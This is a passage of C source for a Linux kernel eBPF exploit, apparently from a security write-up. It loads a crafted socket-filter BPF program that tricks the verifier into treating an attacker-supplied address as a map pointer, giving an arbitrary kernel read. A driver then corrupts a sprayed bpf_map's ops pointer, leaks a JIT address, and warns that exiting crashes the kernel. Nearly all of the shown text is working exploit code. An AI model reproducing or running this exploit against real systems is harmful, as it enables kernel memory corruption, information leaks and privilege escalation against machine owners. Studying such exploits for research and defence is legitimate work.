      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      // NOTE(review): this spills r6 (map_elem), NOT arg3 — the verifier
      // must track fp-0x18 as a map_value pointer so the later
      // map_update_elem() accepts it; the OOB copy below replaces it with
      // the attacker-supplied `addr`.
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val) — verifier thinks map_value ptr, actually `addr`.
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout: [marker][target addr].
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

/*
 * Exploit driver: corrupt one sprayed bpf_map's ->ops (low 16 bits), find
 * the corrupted map and leak a JIT-related pointer through the redirected
 * update_elem slot, then pause so the leak can be inspected before exit
 * (which crashes the kernel because the corrupted map is never restored).
 *
 * Returns 0 on success, -1 if no corrupted map was found.
 */
int main() {
  srand(time(NULL));
  // (removed unused local `char verifier_log[0x10000]` — each helper keeps
  // its own log buffer.)

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] jit_addr: 0x%016lx\n", jit_addr);

  get_enter_to_continue("Press enter to exit(cause kernel crash)...");

  return 0;
}

Reference

Read more →